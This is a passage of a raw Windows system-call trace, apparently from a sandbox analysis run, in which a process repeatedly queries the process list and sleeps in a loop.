ResultLength=0x0) returned 0x0 [0242.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.106] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.113] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.120] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.127] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.134] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.141] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.148] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.154] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.161] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.168] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.177] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.185] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.191] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.198] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.207] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.214] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.221] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.228] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.235] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.242] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.250] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.253] NtAllocateVirtualMemory (in: 